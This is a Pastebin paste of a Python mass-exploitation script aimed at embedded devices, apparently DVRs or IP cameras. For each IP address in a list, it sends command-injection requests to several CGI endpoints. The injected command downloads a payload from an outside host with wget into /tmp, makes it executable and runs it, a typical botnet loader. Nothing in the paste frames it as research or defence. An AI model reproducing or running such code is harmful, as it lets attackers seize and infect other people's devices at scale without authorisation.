Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! python !#
- import threading, sys, time, random, socket, subprocess, re, os, struct, array, requests
- from threading import Thread
- from time import sleep
- import requests
- from requests.auth import HTTPDigestAuth
- from decimal import *
- ips = open(sys.argv[1], "r").readlines()
- #port = sys.argv[2]
- overflow = "A" * 85 #oft some top notch big level devs over here
- send_data = overflow + "$(cd%20/tmp;%20wget%20http://1.1.1.1/well%20-O%20kjxf;%20chmod%20777%20kjxf;%20sh%20kjxf)"
- def run(cmd):
- subprocess.call(cmd, shell=True)
- class rtek(threading.Thread):
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- try:
- print "[] Loading - " + self.ip
- cmd = "cd%20/tmp;%20wget%20http://1.1.1.1/well%20-O%20kjxf;%20chmod%20777%20kjxf;%20sh%20kjxf"
- data = 'DoShellCmd "strCmd=$(cd%20/tmp;%20wget%20http://1.1.1.1/well%20-O%20kjxf;%20chmod%20777%20kjxf;%20sh%20kjxf)&"'
- data2 = 'action=white_led&brightness=$(' + cmd + ' 2>%261) #'
- url = "http://" + self.ip + ":"+port+"/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://1.1.1.1/well%20-O%20kjxf;%20chmod%20777%20kjxf;%20sh%20kjxf)&password=admin"
- url2 = "http://" + self.ip + ":"+port+"/cgi-bin/supervisor/CloudSetup.cgi?exefile=$(cd%20/tmp;%20wget%20http://1.1.1.1/well%20-O%20kjxf;%20chmod%20777%20kjxf;%20sh%20kjxf)"
- url3 = "http://" + self.ip + ":"+port+"/cgi-bin/supervisor/adcommand.cgi"
- url4 = "http://" + self.ip + ":"+port+"/cgi-bin/supervisor/Factory.cgi"
- requests.get(url, timeout=3)
- requests.get(url2, timeout=3)
- requests.post(url3, timeout=3, data=data)
- requests.post(url4, timeout=3, data=data2, headers=headers)
- except Exception as e:
- pass
- for ip in ips:
- try:
- n = rtek(ip)
- n.start()
- time.sleep(0.03)
- except:
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement